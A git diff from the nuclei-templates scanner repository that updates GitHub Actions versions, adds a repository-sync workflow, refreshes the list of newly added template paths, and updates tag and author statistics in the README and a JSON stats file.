diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml index 8270afc60b..702a6e77cd 100644 --- a/.github/workflows/autoassign.yml +++ b/.github/workflows/autoassign.yml @@ -17,7 +17,7 @@ jobs: - name: checkout repo content uses: actions/checkout@v4 # checkout the repository content - name: setup python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: '3.10' # install the python version needed - name: install python packages diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index c6b6e156f1..68ced02c31 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -15,7 +15,7 @@ jobs: steps: - uses: actions/checkout@master - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.19 diff --git a/.github/workflows/readme-update.yml b/.github/workflows/readme-update.yml index 46f6305921..39bf4f8d0f 100644 --- a/.github/workflows/readme-update.yml +++ b/.github/workflows/readme-update.yml @@ -22,7 +22,7 @@ jobs: fetch-depth: 0 - name: Set up Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.8" diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 6bc11dd0bf..6507091256 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -18,7 +18,7 @@ jobs: fetch-depth: 0 - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.21.x diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 859ac151f1..ca7a1da2e9 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -12,7 +12,7 @@ jobs: if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.21.x diff --git a/.github/workflows/template-sign.yml b/.github/workflows/template-sign.yml index d5f91377cd..e61b2d7f09 100644 --- a/.github/workflows/template-sign.yml +++ b/.github/workflows/template-sign.yml @@ -17,7 +17,7 @@ jobs: fetch-depth: 0 - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.21.x diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index eb53b50235..0df4a5ea3c 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -15,7 +15,7 @@ jobs: fetch-depth: 0 - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.21.x @@ -25,5 +25,5 @@ jobs: - name: Template Validation run: | cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./workflows -allow-local-file-access + nuclei -duc -validate -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config + nuclei -duc -validate -w ./workflows -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config diff --git a/.github/workflows/templateman.yml b/.github/workflows/templateman.yml index bf16035437..13dee6773d 100644 --- a/.github/workflows/templateman.yml +++ b/.github/workflows/templateman.yml @@ -13,7 +13,7 @@ jobs: fetch-depth: 0 - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.21.x diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 368aed20f1..897666522d 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -15,7 +15,7 @@ jobs: fetch-depth: 0 - name: Set up Go - uses: actions/setup-go@v4 + uses: actions/setup-go@v5 with: go-version: 1.19 diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml new file mode 100644 index 0000000000..af3d3943ce --- /dev/null +++ b/.github/workflows/templates-sync.yml @@ -0,0 +1,32 @@ +name: Sync Repositories Workflow +on: + push: + paths: + - '.new-additions' + - 'http/cves/2015/CVE-2015-2794.yaml' + - 'http/cves/2023/CVE-2023-42343.yaml' + - 'http/cves/2023/CVE-2023-46574.yaml' + - 'http/exposures/docker-daemon-exposed.yaml' + - 'http/token-spray/api-openai.yaml' + - 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml' + - 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml' + - 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml' + - 'cloud/enum/aws-app-enum.yaml' + - 'cloud/enum/aws-s3-bucket-enum.yaml' + - 'cloud/enum/azure-db-enum.yaml' + - 'cloud/enum/azure-vm-cloud-enum.yaml' + - 'cloud/enum/azure-website-enum.yaml' + - 'cloud/enum/gcp-app-engine-enum.yaml' + - 'cloud/enum/gcp-bucket-enum.yaml' + - 'cloud/enum/gcp-firebase-app-enum.yaml' + - 'cloud/enum/gcp-firebase-rtdb-enum.yaml' + - 'http/cves/2023/CVE-2023-41109.yaml' + - 'network/misconfig/erlang-daemon.yaml' + workflow_dispatch: +jobs: + triggerRemoteWorkflow: + runs-on: ubuntu-latest + steps: + - name: Trigger Remote Workflow with curl + run: | + curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches' diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index 9fe5ebf9e1..ac59e51074 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -14,7 +14,7 @@ jobs: fetch-depth: 0 # otherwise, you will failed to push refs to dest repo - name: Install Python3 - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.10" - run: | diff --git a/.new-additions b/.new-additions index a945fc668a..35f8067578 100644 --- a/.new-additions +++ b/.new-additions @@ -1,33 +1,27 @@ -headless/cves/2018/CVE-2018-25031.yaml -http/cves/2023/CVE-2023-22232.yaml -http/cves/2023/CVE-2023-3368.yaml -http/cves/2023/CVE-2023-36144.yaml -http/cves/2023/CVE-2023-39002.yaml -http/cves/2023/CVE-2023-43177.yaml -http/cves/2023/CVE-2023-49070.yaml -http/cves/2023/CVE-2023-5556.yaml -http/cves/2023/CVE-2023-6018.yaml -http/cves/2023/CVE-2023-6020.yaml -http/cves/2023/CVE-2023-6021.yaml -http/cves/2023/CVE-2023-6380.yaml -http/default-logins/dataease/dataease-default-login.yaml -http/default-logins/splunk/splunk-default-login.yaml -http/exposed-panels/dataease-panel.yaml -http/exposed-panels/reportico-admin-panel.yaml -http/exposed-panels/tailon-panel.yaml -http/exposures/configs/dompdf-config.yaml -http/misconfiguration/installer/businesso-installer.yaml -http/misconfiguration/installer/chamilo-installer.yaml -http/misconfiguration/installer/knowledgetree-installer.yaml -http/misconfiguration/installer/phpgedview-installer.yaml -http/misconfiguration/installer/wowcms-installer.yaml -http/misconfiguration/secnet-info-leak.yaml -http/technologies/element-web-detect.yaml -http/technologies/matrix-homeserver-detect.yaml -http/vulnerabilities/dahua/dahua-wpms-lfi.yaml -http/vulnerabilities/dahua/dahua-wpms-rce.yaml -http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml -http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml -http/vulnerabilities/other/yibao-sqli.yaml -http/vulnerabilities/other/yunanbao-rce.yaml -javascript/cves/2023/CVE-2023-46604.yaml +cloud/enum/aws-app-enum.yaml +cloud/enum/aws-s3-bucket-enum.yaml +cloud/enum/azure-db-enum.yaml +cloud/enum/azure-vm-cloud-enum.yaml +cloud/enum/azure-website-enum.yaml +cloud/enum/gcp-app-engine-enum.yaml +cloud/enum/gcp-bucket-enum.yaml +cloud/enum/gcp-firebase-app-enum.yaml +cloud/enum/gcp-firebase-rtdb-enum.yaml +code/cves/2019/CVE-2019-14287.yaml +code/cves/2021/CVE-2021-3156.yaml +http/cves/2015/CVE-2015-2794.yaml +http/cves/2020/CVE-2020-12124.yaml +http/cves/2023/CVE-2023-41109.yaml +http/cves/2023/CVE-2023-42343.yaml +http/cves/2023/CVE-2023-46574.yaml +http/cves/2023/CVE-2023-50968.yaml +http/cves/2023/CVE-2023-51467.yaml +http/exposures/docker-daemon-exposed.yaml +http/misconfiguration/cookies-without-httponly.yaml +http/misconfiguration/php/php-composer-binary.yaml +http/token-spray/api-openai.yaml +http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml +network/misconfig/erlang-daemon.yaml diff --git a/README.md b/README.md index f0c34ca168..2be3d57393 100644 --- a/README.md +++ b/README.md @@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| -| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | -| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | -| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | -| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | -| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | -| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | -| osint | 675 | pdteam | 283 | dns | 17 | | | | | -| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | -| lfi | 614 | geeknik | 221 | code | 2 | | | | | -| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| +| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 | +| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 | +| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | | +| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | | +| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | | +| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | | +| osint | 677 | pdteam | 286 | dns | 17 | | | | | +| tech | 649 | ricardomaia | 229 | headless | 11 | | | | | +| lfi | 619 | geeknik | 224 | code | 3 | | | | | +| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | | -**525 directories, 7843 files**. +**534 directories, 7902 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 198510367f..70e96e990e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2271},{"name":"panel","count":1034},{"name":"wordpress","count":929},{"name":"xss","count":845},{"name":"exposure","count":833},{"name":"wp-plugin","count":811},{"name":"osint","count":675},{"name":"tech","count":645},{"name":"lfi","count":614},{"name":"edb","count":598},{"name":"misconfig","count":562},{"name":"rce","count":534},{"name":"packetstorm","count":508},{"name":"cve2021","count":473},{"name":"wpscan","count":468},{"name":"cve2022","count":458},{"name":"wp","count":390},{"name":"unauth","count":347},{"name":"authenticated","count":323},{"name":"file","count":321},{"name":"sqli","count":294},{"name":"cve2023","count":292},{"name":"intrusive","count":273},{"name":"cve2020","count":254},{"name":"kev","count":249},{"name":"token-spray","count":242},{"name":"top-200","count":215},{"name":"config","count":213},{"name":"osint-social","count":210},{"name":"oast","count":208},{"name":"","count":195},{"name":"token","count":194},{"name":"default-login","count":186},{"name":"login","count":185},{"name":"iot","count":164},{"name":"detect","count":164},{"name":"apache","count":160},{"name":"cve2018","count":158},{"name":"cve2019","count":157},{"name":"joomla","count":146},{"name":"network","count":140},{"name":"malware","count":131},{"name":"redirect","count":127},{"name":"auth-bypass","count":113},{"name":"cve2010","count":112},{"name":"files","count":111},{"name":"cve2017","count":109},{"name":"ssrf","count":107},{"name":"cms","count":107},{"name":"router","count":105},{"name":"top-100","count":100},{"name":"install","count":95},{"name":"disclosure","count":87},{"name":"devops","count":86},{"name":"takeover","count":75},{"name":"seclists","count":73},{"name":"fileupload","count":71},{"name":"oracle","count":66},{"name":"oss","count":65},{"name":"cisco","count":61},{"name":"huntr","count":59},{"name":"adobe","count":56},{"name":"cve2015","count":56},{"name":"cve2016","count":55},{"name":"google","count":54},{"name":"tokens","count":52},{"name":"atlassian","count":50},{"name":"ir","count":48},{"name":"tenable","count":46},{"name":"log4j","count":46},{"name":"vmware","count":46},{"name":"logs","count":46},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"hackerone","count":44},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"cve2014","count":43},{"name":"jndi","count":43},{"name":"c2","count":43},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":41},{"name":"traversal","count":40},{"name":"springboot","count":39},{"name":"aws","count":38},{"name":"oa","count":38},{"name":"kubernetes","count":37},{"name":"cnvd","count":37},{"name":"deserialization","count":37},{"name":"jira","count":37},{"name":"listing","count":36},{"name":"injection","count":35},{"name":"osint-misc","count":35},{"name":"misc","count":35},{"name":"php","count":35},{"name":"osint-tech","count":31},{"name":"microsoft","count":31},{"name":"fuzz","count":30},{"name":"sap","count":30},{"name":"osint-coding","count":30},{"name":"gitlab","count":28},{"name":"k8s","count":28},{"name":"wp-theme","count":28},{"name":"api","count":27},{"name":"cve2012","count":26},{"name":"ssh","count":26},{"name":"firewall","count":25},{"name":"weaver","count":25},{"name":"proxy","count":25},{"name":"keys","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"osint-shopping","count":24},{"name":"manageengine","count":24},{"name":"amazon","count":24},{"name":"dlink","count":23},{"name":"lfr","count":23},{"name":"stored-xss","count":23},{"name":"zoho","count":23},{"name":"tomcat","count":23},{"name":"cloud","count":23},{"name":"admin","count":22},{"name":"printer","count":21},{"name":"ibm","count":21},{"name":"weblogic","count":21},{"name":"ssl","count":21},{"name":"ecology","count":21},{"name":"yonyou","count":21},{"name":"msf","count":21},{"name":"camera","count":20},{"name":"github","count":20},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"xxe","count":20},{"name":"enum","count":19},{"name":"grafana","count":19},{"name":"citrix","count":19},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"struts","count":19},{"name":"rukovoditel","count":19},{"name":"osint-music","count":18},{"name":"service","count":18},{"name":"wavlink","count":18},{"name":"android","count":18},{"name":"ftp","count":18},{"name":"cti","count":17},{"name":"nginx","count":17},{"name":"cve2011","count":17},{"name":"backup","count":16},{"name":"status","count":16},{"name":"honeypot","count":16},{"name":"ruijie","count":16},{"name":"confluence","count":16},{"name":"cve2009","count":16},{"name":"microweber","count":16},{"name":"osint-blog","count":16},{"name":"tongda","count":15},{"name":"java","count":15},{"name":"js","count":15},{"name":"cve2008","count":15},{"name":"rconfig","count":15},{"name":"zyxel","count":15},{"name":"seeyon","count":15},{"name":"magento","count":15},{"name":"coldfusion","count":15},{"name":"jarm","count":15},{"name":"hp","count":15},{"name":"cnvd2021","count":15},{"name":"mail","count":15},{"name":"dell","count":14},{"name":"woocommerce","count":14},{"name":"nodejs","count":14},{"name":"npm","count":14},{"name":"cve2013","count":14},{"name":"alibaba","count":14},{"name":"login-check","count":14},{"name":"audit","count":14},{"name":"icewarp","count":14},{"name":"osint-art","count":14},{"name":"azure","count":14},{"name":"bypass","count":14},{"name":"creds-stuffing","count":14},{"name":"domainmod","count":14},{"name":"jboss","count":14},{"name":"osint-health","count":14},{"name":"fortigate","count":13},{"name":"rails","count":13},{"name":"laravel","count":13},{"name":"sonicwall","count":13},{"name":"ruby","count":13},{"name":"file-upload","count":13},{"name":"backdoor","count":13},{"name":"vpn","count":13},{"name":"setup","count":13},{"name":"osint-dating","count":13},{"name":"cuppa","count":13},{"name":"auth","count":13},{"name":"airflow","count":13},{"name":"osint-political","count":13},{"name":"abstractapi","count":13},{"name":"git","count":12},{"name":"dashboard","count":12},{"name":"zimbra","count":12},{"name":"netsweeper","count":12},{"name":"javascript","count":12},{"name":"drupal","count":12},{"name":"netgear","count":12},{"name":"redis","count":12},{"name":"webserver","count":12},{"name":"kafka","count":12},{"name":"graphql","count":12},{"name":"docker","count":11},{"name":"online-fire-reporting","count":11},{"name":"fastjson","count":11},{"name":"ssti","count":11},{"name":"prestashop","count":11},{"name":"headless","count":11},{"name":"node","count":11},{"name":"osint-video","count":11},{"name":"jolokia","count":11},{"name":"xstream","count":11},{"name":"spring","count":11},{"name":"phpmyadmin","count":11},{"name":"smtp","count":10},{"name":"windows","count":10},{"name":"prometheus","count":10},{"name":"dedecms","count":10},{"name":"db","count":10},{"name":"elasticsearch","count":10},{"name":"django","count":10},{"name":"solarview","count":10},{"name":"glpi","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"installer","count":10},{"name":"thinkphp","count":10},{"name":"cnvd2020","count":9},{"name":"firebase","count":9},{"name":"jetbrains","count":9},{"name":"druid","count":9},{"name":"kube","count":9},{"name":"iis","count":9},{"name":"wso2","count":9},{"name":"versa","count":9},{"name":"bitbucket","count":9},{"name":"scada","count":9},{"name":"opencats","count":9},{"name":"pfsense","count":9},{"name":"secret","count":9},{"name":"gitea","count":9},{"name":"hikvision","count":9},{"name":"sangfor","count":9},{"name":"vcenter","count":9},{"name":"solr","count":9},{"name":"cache","count":9},{"name":"vbulletin","count":8},{"name":"default-page","count":8},{"name":"spotweb","count":8},{"name":"unauthenticated","count":8},{"name":"symantec","count":8},{"name":"oauth","count":8},{"name":"ognl","count":8},{"name":"metadata","count":8},{"name":"bucket","count":8},{"name":"cisco-switch","count":8},{"name":"osint-news","count":8},{"name":"moodle","count":8},{"name":"config-audit","count":8},{"name":"manager","count":8},{"name":"hms","count":8},{"name":"emerge","count":8},{"name":"exchange","count":8},{"name":"crlf","count":8},{"name":"e-office","count":8},{"name":"mirai","count":8},{"name":"atom","count":8},{"name":"console","count":8},{"name":"recon","count":8},{"name":"gogs","count":7},{"name":"hashicorp","count":7},{"name":"maps","count":7},{"name":"vms","count":7},{"name":"solarwinds","count":7},{"name":"blind","count":7},{"name":"odoo","count":7},{"name":"bloofox","count":7},{"name":"error","count":7},{"name":"bigip","count":7},{"name":"squirrelmail","count":7},{"name":"fortios","count":7},{"name":"go","count":7},{"name":"ofbiz","count":7},{"name":"blockchain","count":7},{"name":"filemanager","count":7},{"name":"ec2","count":7},{"name":"avtech","count":7},{"name":"ivanti","count":7},{"name":"nacos","count":7},{"name":"samsung","count":7},{"name":"ruckus","count":7},{"name":"activemq","count":7},{"name":"moodating","count":7},{"name":"nagios","count":7},{"name":"wanhu","count":7},{"name":"huawei","count":7},{"name":"sophos","count":7},{"name":"phpinfo","count":7},{"name":"nagiosxi","count":7},{"name":"discord","count":7},{"name":"instrusive","count":7},{"name":"shopify","count":7},{"name":"pmb","count":7},{"name":"mobileiron","count":7},{"name":"artica","count":7},{"name":"exploitdb","count":7},{"name":"dropbox","count":7},{"name":"websphere","count":7},{"name":"facebook","count":7},{"name":"fpd","count":6},{"name":"jamf","count":6},{"name":"microstrategy","count":6},{"name":"log","count":6},{"name":"jetty","count":6},{"name":"keycloak","count":6},{"name":"74cms","count":6},{"name":"plesk","count":6},{"name":"rfi","count":6},{"name":"slack","count":6},{"name":"newrelic","count":6},{"name":"minio","count":6},{"name":"elfinder","count":6},{"name":"openvpn","count":6},{"name":"asp","count":6},{"name":"nexus","count":6},{"name":"python","count":6},{"name":"liferay","count":6},{"name":"geoserver","count":6},{"name":"webmin","count":6},{"name":"magmi","count":6},{"name":"opensis","count":6},{"name":"kubelet","count":6},{"name":"mongodb","count":6},{"name":"jeecg","count":6},{"name":"leak","count":6},{"name":"doctor-appointment-system","count":6},{"name":"cacti","count":6},{"name":"tikiwiki","count":6},{"name":"cockpit","count":6},{"name":"cobbler","count":6},{"name":"servicenow","count":6},{"name":"database","count":6},{"name":"sonarqube","count":6},{"name":"s3","count":6},{"name":"lucee","count":6},{"name":"flutterwave","count":6},{"name":"zhiyuan","count":6},{"name":"fatpipe","count":5},{"name":"avideo","count":5},{"name":"tls","count":5},{"name":"akamai","count":5},{"name":"apisix","count":5},{"name":"bmc","count":5},{"name":"xmlrpc","count":5},{"name":"jupyter","count":5},{"name":"caucho","count":5},{"name":"jwt","count":5},{"name":"papercut","count":5},{"name":"avaya","count":5},{"name":"beyondtrust","count":5},{"name":"express","count":5},{"name":"server","count":5},{"name":"couchdb","count":5},{"name":"sftp","count":5},{"name":"gocd","count":5},{"name":"awstats","count":5},{"name":"carrental","count":5},{"name":"chanjet","count":5},{"name":"info-leak","count":5},{"name":"square","count":5},{"name":"kkfileview","count":5},{"name":"strapi","count":5},{"name":"metinfo","count":5},{"name":"jabber","count":5},{"name":"landray","count":5},{"name":"parallels","count":5},{"name":"web3","count":5},{"name":"openemr","count":5},{"name":"moosocial","count":5},{"name":"hybris","count":5},{"name":"mysql","count":5},{"name":"storage","count":5},{"name":"zzzcms","count":5},{"name":"ethereum","count":5},{"name":"firmware","count":5},{"name":"smb","count":5},{"name":"tenda","count":5},{"name":"microfocus","count":5},{"name":"resin","count":5},{"name":"dionaea","count":5},{"name":"elastic","count":5},{"name":"typo3","count":5},{"name":"circarlife","count":5},{"name":"adminer","count":5},{"name":"sql","count":5},{"name":"rseenet","count":5},{"name":"paypal","count":5},{"name":"linux","count":5},{"name":"asana","count":5},{"name":"gateway","count":5},{"name":"vrealize","count":5},{"name":"terramaster","count":5},{"name":"graylog","count":4},{"name":"gnuboard","count":4},{"name":"phppgadmin","count":4},{"name":"password","count":4},{"name":"sysaid","count":4},{"name":"flink","count":4},{"name":"craftcms","count":4},{"name":"cve2005","count":4},{"name":"umbraco","count":4},{"name":"splunk","count":4},{"name":"h3c","count":4},{"name":"swagger","count":4},{"name":"froxlor","count":4},{"name":"hongdian","count":4},{"name":"zend","count":4},{"name":"qdpm","count":4},{"name":"pentaho","count":4},{"name":"shiro","count":4},{"name":"dolibarr","count":4},{"name":"stripe","count":4},{"name":"panabit","count":4},{"name":"puppet","count":4},{"name":"datadog","count":4},{"name":"newstatpress","count":4},{"name":"kibana","count":4},{"name":"grav","count":4},{"name":"flatpress","count":4},{"name":"mautic","count":4},{"name":"aura","count":4},{"name":"seagate","count":4},{"name":"artifactory","count":4},{"name":"wp-statistics","count":4},{"name":"teamcity","count":4},{"name":"codeigniter","count":4},{"name":"postmessage","count":4},{"name":"consul","count":4},{"name":"telerik","count":4},{"name":"osint-archived","count":4},{"name":"f5","count":4},{"name":"royalevent","count":4},{"name":"mlflow","count":4},{"name":"kevinlab","count":4},{"name":"aspose","count":4},{"name":"sugarcrm","count":4},{"name":"goanywhere","count":4},{"name":"dropbear","count":4},{"name":"centos","count":4},{"name":"wbce","count":4},{"name":"httpserver","count":4},{"name":"easypost","count":4},{"name":"jellyfin","count":4},{"name":"ldap","count":4},{"name":"kentico","count":4},{"name":"aria","count":4},{"name":"axigen","count":4},{"name":"spark","count":4},{"name":"httpd","count":4},{"name":"pie-register","count":4},{"name":"thinkcmf","count":4},{"name":"ems","count":4},{"name":"zte","count":4},{"name":"casaos","count":4},{"name":"nosqli","count":4},{"name":"sentry","count":4},{"name":"churchcrm","count":4},{"name":"photo","count":4},{"name":"confluent","count":4},{"name":"hoteldruid","count":4},{"name":"elementor","count":4},{"name":"search","count":4},{"name":"cve2007","count":4},{"name":"hpe","count":4},{"name":"bitrix","count":4},{"name":"pixie","count":4},{"name":"sound4","count":4},{"name":"mantisbt","count":4},{"name":"info","count":4},{"name":"ampache","count":4},{"name":"webshell","count":4},{"name":"sendgrid","count":4},{"name":"phpjabber","count":4},{"name":"telesquare","count":4},{"name":"heroku","count":4},{"name":"candidats","count":4},{"name":"totolink","count":4},{"name":"rabbitmq","count":4},{"name":"yeswiki","count":4},{"name":"pega","count":4},{"name":"hongfan","count":4},{"name":"arcgis","count":4},{"name":"springcloud","count":4},{"name":"ebs","count":4},{"name":"linkerd","count":4},{"name":"openfire","count":4},{"name":"concrete","count":4},{"name":"openstack","count":4},{"name":"prtg","count":4},{"name":"powerjob","count":4},{"name":"bittrex","count":4},{"name":"cloudflare","count":4},{"name":"qnap","count":4},{"name":"harbor","count":4},{"name":"cnvd2019","count":4},{"name":"kingsoft","count":4},{"name":"panos","count":4},{"name":"redmine","count":4},{"name":"finicity","count":4},{"name":"moveit","count":4},{"name":"age-encryption","count":4},{"name":"metersphere","count":4},{"name":"nextjs","count":4},{"name":"roxy","count":4},{"name":"metasploit","count":4},{"name":"mailchimp","count":4},{"name":"jorani","count":4},{"name":"mostracms","count":4},{"name":"mostra","count":4},{"name":"metabase","count":4},{"name":"wcs","count":4},{"name":"voip","count":4},{"name":"mikrotik","count":4},{"name":"cnvd2022","count":4},{"name":"horde","count":4},{"name":"flickr","count":4},{"name":"epson","count":3},{"name":"ansible","count":3},{"name":"proftpd","count":3},{"name":"flexvnf","count":3},{"name":"electron","count":3},{"name":"linksys","count":3},{"name":"itop","count":3},{"name":"etcd","count":3},{"name":"loytec","count":3},{"name":"angular","count":3},{"name":"getsimple","count":3},{"name":"etsy","count":3},{"name":"fuelcms","count":3},{"name":"graph","count":3},{"name":"axis","count":3},{"name":"dubbo","count":3},{"name":"fastly","count":3},{"name":"dom","count":3},{"name":"eshop","count":3},{"name":"xerox","count":3},{"name":"openbmcs","count":3},{"name":"ueditor","count":3},{"name":"cas","count":3},{"name":"voipmonitor","count":3},{"name":"selea","count":3},{"name":"gradle","count":3},{"name":"empirecms","count":3},{"name":"apollo","count":3},{"name":"fanruan","count":3},{"name":"owncloud","count":3},{"name":"redash","count":3},{"name":"glassfish","count":3},{"name":"sharefile","count":3},{"name":"jitsi","count":3},{"name":"webadmin","count":3},{"name":"flutter","count":3},{"name":"e-cology","count":3},{"name":"actuator","count":3},{"name":"cluster","count":3},{"name":"csrf","count":3},{"name":"key","count":3},{"name":"nuget","count":3},{"name":"processwire","count":3},{"name":"securepoint","count":3},{"name":"http","count":3},{"name":"lighttpd","count":3},{"name":"xxljob","count":3},{"name":"nortek","count":3},{"name":"selenium","count":3},{"name":"fanwei","count":3},{"name":"intercom","count":3},{"name":"labkey","count":3},{"name":"piwigo","count":3},{"name":"lansweeper","count":3},{"name":"pyload","count":3},{"name":"webmail","count":3},{"name":"credential","count":3},{"name":"osticket","count":3},{"name":"casdoor","count":3},{"name":"d-link","count":3},{"name":"covenant","count":3},{"name":"sitemap","count":3},{"name":"forum","count":3},{"name":"webcam","count":3},{"name":"zerof","count":3},{"name":"3cx","count":3},{"name":"samba","count":3},{"name":"rocketchat","count":3},{"name":"listserv","count":3},{"name":"sony","count":3},{"name":"figma","count":3},{"name":"evlink","count":3},{"name":"trixbox","count":3},{"name":"weiphp","count":3},{"name":"webkul-qloapps","count":3},{"name":"buffalo","count":3},{"name":"thruk","count":3},{"name":"drawio","count":3},{"name":"zeroshell","count":3},{"name":"mcafee","count":3},{"name":"telegram","count":3},{"name":"dotcms","count":3},{"name":"yzmcms","count":3},{"name":"clusterengine","count":3},{"name":"bigant","count":3},{"name":"spip","count":3},{"name":"messaging","count":3},{"name":"telnet","count":3},{"name":"modem","count":3},{"name":"mpsec","count":3},{"name":"openam","count":3},{"name":"postman","count":3},{"name":"copyparty","count":3},{"name":"synology","count":3},{"name":"aruba","count":3},{"name":"targa","count":3},{"name":"wordfence","count":3},{"name":"airtable","count":3},{"name":"trendnet","count":3},{"name":"sharepoint","count":3},{"name":"waf","count":3},{"name":"dahua","count":3},{"name":"adafruit","count":3},{"name":"gibbon","count":3},{"name":"twitter","count":3},{"name":"kfm","count":3},{"name":"e-mobile","count":3},{"name":"rackn","count":3},{"name":"saltstack","count":3},{"name":"cnvd2023","count":3},{"name":"rat","count":3},{"name":"shell","count":3},{"name":"pypi","count":3},{"name":"mailgun","count":3},{"name":"juniper","count":3},{"name":"superadmin","count":3},{"name":"hsphere","count":3},{"name":"openwrt","count":3},{"name":"ixcache","count":3},{"name":"env","count":3},{"name":"thinfinity","count":3},{"name":"axis2","count":3},{"name":"ampps","count":3},{"name":"lotus","count":3},{"name":"magnolia","count":3},{"name":"clientid","count":3},{"name":"postgres","count":3},{"name":"purchase-order-management-system","count":3},{"name":"idrac","count":3},{"name":"afterlogic","count":3},{"name":"tautulli","count":3},{"name":"dzzoffice","count":3},{"name":"yii","count":3},{"name":"favicon","count":3},{"name":"webtareas","count":3},{"name":"self-hosted","count":3},{"name":"geowebserver","count":3},{"name":"axway","count":3},{"name":"nuxtjs","count":3},{"name":"adiscon","count":3},{"name":"vercel","count":3},{"name":"zendesk","count":3},{"name":"octobercms","count":3},{"name":"netdata","count":3},{"name":"postgresql","count":3},{"name":"rubygems","count":3},{"name":"matrix","count":3},{"name":"oos","count":3},{"name":"newsletter","count":3},{"name":"payara","count":3},{"name":"mapbox","count":3},{"name":"i3geo","count":3},{"name":"poms","count":3},{"name":"segment","count":3},{"name":"backdrop","count":3},{"name":"jeesns","count":3},{"name":"dos","count":3},{"name":"tableau","count":3},{"name":"r-seenet","count":3},{"name":"jfrog","count":3},{"name":"carel","count":3},{"name":"droneci","count":3},{"name":"dreambox","count":3},{"name":"bruteforce","count":3},{"name":"nuuo","count":3},{"name":"webalizer","count":3},{"name":"discourse","count":3},{"name":"httpb